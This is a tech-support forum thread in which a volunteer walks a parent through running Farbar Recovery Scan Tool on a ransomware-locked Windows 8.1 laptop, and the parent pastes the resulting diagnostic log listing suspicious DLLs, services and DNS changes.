Solved Pretty sure our laptop has a virus/malware but don't know what to do - need step-by-step instruction

Gitanjali

Hi,

Sorry about this - not too sure who to turn to as I think that with your help, I could be able to fix this problem. Kids downloaded something and then computer started acting up. Can't even do anything unless I'm in safe mode. Laptop runs Windows 8.1 and it is a few years old as it came from the kids' father. I can email the jpg screenshot. Would appreciate any help/assistance you could offer.

Kind regards,
Not too tech-savvy single-mom
 
Welcome aboard

Please complete all steps listed here: https://www.techspot.com/community/...lware-removal-preliminary-instructions.58138/
Make sure you PASTE all logs. If a log exceeds the 50,000-character post limit, split it between a couple of replies.
Attached logs won't be reviewed.

Please observe the following rules:
  • Read all of my instructions very carefully. Your mistakes during cleaning process may have very serious consequences, like unbootable computer.
  • If you're stuck, or you're not sure about certain step, always ask before doing anything else.
  • Please refrain from running any tools, fixes or applying any changes to your computer other than those I suggest.
  • Never run more than one scan at a time.
  • Keep updating me regarding your computer behavior, good, or bad.
  • The cleaning process, once started, has to be completed. Even if your computer appears to act better, it may still be infected. Once the computer is totally clean, I'll certainly let you know.
  • If you leave the topic without explanation in the middle of a cleaning process, you may not be eligible to receive any more help in malware removal forum.
  • I close my topics if you have not replied in 5 days. If you need more time, simply let me know. If I closed your topic and you need it to be reopened, simply PM me.
 
Thanks for the prompt response; however, I can't even start as I can't get anything open as the message takes up the whole screen and the keyboard seems to be unresponsive. I now can't get into safe mode and have tried a few times. Still wondering where to start. Thanks for taking the time to help :)
 
NOTE 1. Use another working computer to download Farbar Recovery Scan Tool. Use USB flash drive to transfer it from good computer to the bad one.
NOTE 2. Install Panda USB Vaccine, or BitDefender’s USB Immunizer on GOOD computer to protect it from any infected USB device.

For x32 (x86) bit systems download Farbar Recovery Scan Tool 32-Bit and save it to a flash drive.
For x64 bit systems download Farbar Recovery Scan Tool 64-Bit and save it to a flash drive.

Plug the flashdrive into the infected PC.

If you are using Windows 10: if you're having problems accessing System Recovery Options, create a Windows 10 USB or DVD as described here: http://betanews.com/2015/07/29/how-...your-own-installation-usb-flash-drive-or-dvd/ and boot from it.

If you are using Windows 8 consult How to use the Windows 8 System Recovery Environment Command Prompt to enter System Recovery Command prompt. To access Advanced Boot Options start and shut down computer TWICE. On third start you should see Advanced Boot Options.

If you are using Vista or Windows 7 enter System Recovery Options.

To enter System Recovery Options from the Advanced Boot Options:
  • Restart the computer.
  • As soon as the BIOS is loaded begin tapping the F8 key until Advanced Boot Options appears.
  • Use the arrow keys to select the Repair your computer menu item.
  • Select US as the keyboard language settings, and then click Next.
  • Select the operating system you want to repair, and then click Next.
  • Select your user account and click Next.

To enter System Recovery Options by using Windows installation disc:
  • Insert the installation disc.
  • Restart your computer.
  • If prompted, press any key to start Windows from the installation disc. If your computer is not configured to start from a CD or DVD, check your BIOS settings.
  • Click Repair your computer.
  • Select US as the keyboard language settings, and then click Next.
  • Select the operating system you want to repair, and then click Next.
  • Select your user account and click Next.

On the System Recovery Options menu you will get the following options:

  • Startup Repair
  • System Restore
  • Windows Complete PC Restore
  • Windows Memory Diagnostic Tool
  • Command Prompt

  • Select Command Prompt
  • In the command window type in notepad and press Enter.
  • The notepad opens. Under File menu select Open.
  • Select "Computer" and find your flash drive letter and close the notepad.
  • In the command window type e:\frst (for x64 bit version type e:\frst64) and press Enter
    Note:
    Replace letter e with the drive letter of your flash drive.
  • The tool will start to run.
  • When the tool opens click Yes to disclaimer.
  • Press Scan button.
  • It will make a log (FRST.txt) on the flash drive. Please copy and paste it to your reply.
 
Just a quick question - if I've already backed up my data and have a reboot USB that will put my computer back to factory settings and supposedly wipe the system clean, should I do that instead? I know that you've given me detailed advice (which I truly appreciate) but I'm wondering, won't that be the easiest way to restart from scratch, or do you think it best not to do that at all?
 
Incorrect version will simply throw an error so you can't break anything by trying.
 
Okay scan is running - I'm thinking that once it's done - a dialogue box should pop up? Right? Any ideas as to how long it takes as the tool is now not responding and the command prompt has now gone back to flashing. I'd like to take out the USB but don't want to until it is safe to do.
 
Sorry another couple of quick questions

- What do you do with the log after I post it? I'm hoping that you'll continue to give me detailed instructions on how to remove whatever it is on the system.

- Are you on Pacific Time? As I'd like to see if it's at all possible to get this fixed asap.

Again - thanks for your help :)
 
So here it is:


Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:10-01-2015 01
Ran by owner (administrator) on ACER (10-01-2016 18:13:23)
Running from E:\
Loaded Profiles: owner (Available Profiles: owner)
Platform: Windows 8.1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser not detected!)
Boot Mode: Safe Mode (minimal)
Tutorial for Farbar Recovery Scan Tool:

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe


==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [12503184 2012-06-10] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_Dolby] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1212048 2012-06-07] (Realtek Semiconductor)
HKLM\...\Run: [HotKeysCmds] => C:\Windows\system32\hkcmd.exe
HKLM\...\Run: [Persistence] => C:\Windows\system32\igfxpers.exe
HKLM\...\Run: [BtPreLoad] => C:\Program Files (x86)\Bluetooth Suite\BtPreLoad.exe [64640 2012-08-10] ()
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [170256 2015-10-16] (Apple Inc.)
HKLM\...\Run: [Sound+] => "C:\Program Files\Sound+\Sound+.exe"
HKLM-x32\...\Run: [Dolby Home Theater v4] => C:\Dolby PCEE4\pcee4.exe [508256 2012-04-23] (Dolby Laboratories Inc.)
HKLM-x32\...\Run: [LManager] => [X]
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [91520 2010-03-13] (Microsoft Corporation)
HKLM-x32\...\Run: [mcui_exe] => "C:\Program Files\McAfee.com\Agent\mcagent.exe" /runkey
HKLM-x32\...\Run: [Cisco AnyConnect Secure Mobility Agent for Windows] => C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnui.exe [708496 2015-07-22] (Cisco Systems, Inc.)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2015-08-06] (Apple Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [597040 2015-10-06] (Oracle Corporation)
HKLM-x32\...\Run: [oasi_en_323010107] => [X]
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3013712 2015-12-14] (Valve Corporation)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [uTorrent] => C:\Users\owner\AppData\Roaming\uTorrent\uTorrent.exe [2026520 2015-12-02] (BitTorrent Inc.)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Spotify Web Helper] => C:\Users\owner\AppData\Roaming\Spotify\SpotifyWebHelper.exe [2346096 2015-12-21] (Spotify Ltd)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [50378880 2015-12-17] (Skype Technologies S.A.)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Gyazo] => C:\Program Files (x86)\Gyazo\GyStation.exe [3098424 2015-08-19] (Nota Inc.)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Spotify] => C:\Users\owner\AppData\Roaming\Spotify\Spotify.exe [8387696 2015-12-21] (Spotify Ltd)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Birds] => C:\Users\owner\AppData\Local\Birds\birds365.exe [113664 2016-01-09] (Birds)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8590760 2015-12-08] (Piriform Ltd)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Policies\system: [DisableTaskMgr] 1
AppInit_DLLs: C:\ProgramData\Medlight\Icenix.dll => No File
AppInit_DLLs-x32: C:\ProgramData\Medlight\Topstrong.dll => No File
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Acer Backup Manager Tray.lnk [2016-01-10]
ShortcutTarget: Acer Backup Manager Tray.lnk -> C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe (NTI Corporation)
GroupPolicy: Restriction - Chrome <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Winsock: Catalog9 01 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
Winsock: Catalog9 02 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
Winsock: Catalog9 03 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
Winsock: Catalog9 04 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
Winsock: Catalog9 16 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
Winsock: Catalog9-x64 01 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
Winsock: Catalog9-x64 02 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
Winsock: Catalog9-x64 03 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
Winsock: Catalog9-x64 04 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
Winsock: Catalog9-x64 16 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254 75.153.176.1
Tcpip\..\Interfaces\{1CF1C519-43BC-43DC-A100-5452BECE63BD}: [DhcpNameServer] 192.168.1.254 75.153.176.1
Tcpip\..\Interfaces\{22E2DD4D-5728-4E97-8740-AA750D016189}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{3D911366-3BDF-44E8-8347-B89013568C76}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{559265AC-3060-4BF7-B113-B1CA25913253}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{6504a844-a2c7-11e4-824e-806e6f6e6963}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{8718928D-CBEB-45EA-A621-800A9249001D}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{DD3443D7-3BB0-4CD6-95B5-911D51D04343}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{DD3443D7-3BB0-4CD6-95B5-911D51D04343}: [DhcpNameServer] 192.168.42.129

Internet Explorer:
==================
HKU\S-1-5-21-3773202632-424774445-890114178-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://acer13.msn.com
SearchScopes: HKLM -> DefaultScope {87CE1942-94DA-4865-9277-D2ADDAA931E6} URL =
SearchScopes: HKU\S-1-5-21-3773202632-424774445-890114178-1001 -> DefaultScope {87CE1942-94DA-4865-9277-D2ADDAA931E6} URL =
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2011-02-11] (Microsoft Corporation)
BHO: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll [2012-08-10] (Qualcomm Atheros Commnucations)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-10-12] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2010-12-21] (Microsoft Corporation)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2011-02-11] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\ssv.dll [2015-10-31] (Oracle Corporation)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-10-12] (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2010-12-21] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\jp2ssv.dll [2015-10-31] (Oracle Corporation)
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
Handler-x32: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
Handler-x32: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-10-12] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-10-12] (Microsoft Corporation)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe

FireFox:
========
FF ProfilePath: C:\Users\owner\AppData\Roaming\Mozilla\Firefox\Profiles\2ptnmu3o.default
FF Homepage: hxxps://www.malwarebytes.org/restorebrowser/
FF Homepage: hxxps://www.malwarebytes.org/restorebrowser/.com/?site=shyosffdefault&prd=set_ff&s=G1Azbwybl01,2e5a8f18-7777-4848-9eed-2132ef3331e1,
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_20_0_0_267.dll [2015-12-28] ()
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_267.dll [2015-12-28] ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2015-10-08] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-06-06] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-06-06] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.65.2 -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\dtplugin\npDeployJava1.dll [2015-10-31] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.65.2 -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\plugin2\npjp2.dll [2015-10-31] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-03] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-03] (Google Inc.)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\1\NP_wtapp.dll [2014-11-14] ()
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2015-09-30] (Adobe Systems Inc.)
FF user.js: detected! => C:\Users\owner\AppData\Roaming\Mozilla\Firefox\Profiles\2ptnmu3o.default\user.js [2016-01-09]
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\McSiteAdvisor.xml [2015-10-03]
FF Extension: McAfee WebAdvisor - C:\Users\owner\AppData\Roaming\Mozilla\Firefox\Profiles\2ptnmu3o.default\extensions\{4ED1F68A-5463-4931-9384-8FFF5ED91D92}.xpi [2015-08-04] [not signed]
FF Extension: Skype Click to Call - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2015-10-08]
FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
FF Extension: McAfee WebAdvisor - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi [2015-11-23]
FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
StartMenuInternet: FIREFOX.EXE - firefox.exe

Chrome:
=======
CHR Profile: C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Docs) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-01-09]
CHR Extension: (Google Drive) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-01-09]
CHR Extension: (YouTube) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-01-09]
CHR Extension: (Google Search) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-01-09]
CHR Extension: (Gmail) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-01-09]
CHR Profile: C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1
CHR Extension: (Google Slides) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-11-25]
CHR Extension: (Google Docs) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2015-11-25]
CHR Extension: (Google Drive) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-25]
CHR Extension: (YouTube) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-11-25]
CHR Extension: (Google Search) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-25]
CHR Extension: (Google Sheets) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-11-25]
CHR Extension: (SiteAdvisor) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2015-11-25]
CHR Extension: (Google Docs Offline) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-11-25]
CHR Extension: (Taplika New Tab) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\lfkjojacgdjkninepeghaamnapdjmlfn [2015-11-25]
CHR Extension: (Skype Click to Call) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2015-11-25]
CHR Extension: (Chrome Web Store Payments) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-11-25]
CHR Extension: (Gmail) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-11-25]
CHR HKLM\...\Chrome\Extension: [edfhabmbbhdcdpnoilchepfojmdeannd] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [fcgnigmofekcllgbiejhmigggmgehkip] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2015-12-11]
CHR HKLM-x32\...\Chrome\Extension: [edfhabmbbhdcdpnoilchepfojmdeannd] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [fcgnigmofekcllgbiejhmigggmgehkip] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2015-12-11]
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2015-10-12]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S2 AmazingTab; C:\Program Files\amztab\amztab.exe [383488 2016-01-09] () [File not signed]
S2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [77104 2015-10-07] (Apple Inc.)
S2 ApplicationHosting; C:\ProgramData\\ApplicationHosting\\ApplicationHosting.exe [538112 2016-01-09] () [File not signed]
S2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [211584 2012-08-10] (Qualcomm Atheros Commnucations) [File not signed]
S2 BrcmCardReader; C:\Program Files\Broadcom\MemoryCard\BrcmCardReader.exe [176640 2012-08-20] (Broadcom Corp.) [File not signed]
S2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2015-10-12] (Microsoft Corporation)
S2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2015-10-12] (Microsoft Corporation)
S2 CCDMonitorService; C:\Program Files (x86)\Acer\Acer Cloud\CCDMonitorService.exe [2435728 2012-08-23] (Acer Incorporated)
S2 cmdidx; C:\Program Files\cmdidx\cmdidx.exe [383488 2016-01-09] () [File not signed]
S3 DeviceFastLaneService; C:\Program Files\Acer\Acer Device Fast-lane\DeviceFastLaneSvc.exe [468624 2012-08-22] (Acer Incorporated)
S3 ePowerSvc; C:\Program Files\Acer\Acer Power Management\ePowerSvc.exe [658576 2012-08-22] (Acer Incorporated)
S2 extradoynldownkzhd; C:\Users\owner\AppData\Local\Donelectronics.exe [28160 2016-01-09] () [File not signed]
S2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [25800 2015-09-28] (Hewlett-Packard Company)
S2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [319376 2014-10-01] (Intel Corporation)
S2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [165760 2012-07-17] (Intel Corporation)
S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
S2 McAfee SiteAdvisor Service; C:\Program Files (x86)\McAfee\SiteAdvisor\McSACore.exe [157928 2015-12-02] (McAfee, Inc.)
S2 NTI IScheduleSvc; C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe [259136 2012-11-02] (NTI Corporation)
S2 RfButtonDriverService; C:\Windows\RfBtnSvc64.exe [93296 2012-10-09] (Dritek System INC.)
S3 Steam Client Service; C:\Program Files (x86)\Common Files\Steam\SteamService.exe [836176 2015-12-14] (Valve Corporation) [File not signed]
S2 Task Server; C:\Program Files\Task Server\TaskServer.exe [796160 2016-01-09] (Copyright © Microsoft 2015) [File not signed]
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366520 2015-02-03] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23792 2015-02-03] (Microsoft Corporation)
S2 ZAtheros Wlan Agent; C:\Program Files (x86)\Qualcomm Atheros\Ath_WlanAgent.exe [81536 2012-07-31] (Atheros) [File not signed]
S2 Gejdiubx; "C:\Users\owner\AppData\Roaming\RujgAjueocf\Remdhuus.exe" -cms [X]

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 BTATH_LWFLT; C:\Windows\system32\DRIVERS\btath_lwflt.sys [76952 2012-08-10] (Qualcomm Atheros)
S3 dot4; C:\Windows\system32\DRIVERS\Dot4.sys [151968 2012-10-19] (Windows (R) Win 7 DDK provider)
S3 Dot4Print; C:\Windows\System32\drivers\Dot4Prt.sys [27040 2012-10-19] (Windows (R) Win 7 DDK provider)
R0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)
S3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
S3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-01-10] (Malwarebytes)
S3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)
S3 mfesapsn; C:\Program Files (x86)\McAfee\SiteAdvisor\x64\mfesapsn.sys [37960 2015-12-02] (McAfee, Inc.)
R3 Ps2Kb2Hid; C:\Windows\System32\drivers\aPs2Kb2Hid.sys [26736 2012-10-09] (Dritek System Inc.)
S3 usbrndis6; C:\Windows\system32\DRIVERS\usb80236.sys [20992 2013-08-22] (Microsoft Corporation)
S3 voxaldriver; C:\Windows\system32\DRIVERS\voxaldriverx64.sys [34512 2015-10-26] ()
S3 vpnva; C:\Windows\system32\DRIVERS\vpnva64-6.sys [52592 2014-10-16] (Cisco Systems, Inc.)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44024 2015-02-03] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [264000 2015-02-03] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114496 2015-02-03] (Microsoft Corporation)
S3 EagleX64; \??\C:\WINDOWS\system32\drivers\EagleX64.sys [X]
S1 swsedrvr_vw_1_10_0_25; system32\drivers\swsedrvr_vw_1_10_0_25.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-01-10 18:13 - 2016-01-10 18:13 - 00000000 ____D C:\FRST
2016-01-10 15:09 - 2016-01-10 15:09 - 00000000 ____D C:\Program Files\Task Service
2016-01-10 15:09 - 2016-01-10 15:09 - 00000000 ____D C:\Program Files\Scan Service
2016-01-10 15:07 - 2016-01-10 15:09 - 00140288 _____ (Microsoft) C:\WINDOWS\system32\MalwareScanner.exe
2016-01-10 15:07 - 2016-01-10 15:09 - 00071168 _____ (Microsoft) C:\WINDOWS\system32\WindowsLock.exe
2016-01-10 14:30 - 2016-01-10 15:21 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2016-01-10 14:30 - 2016-01-10 14:56 - 00001112 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-01-10 14:30 - 2016-01-10 14:30 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-01-10 14:30 - 2016-01-10 14:30 - 00000000 ____D C:\ProgramData\Malwarebytes
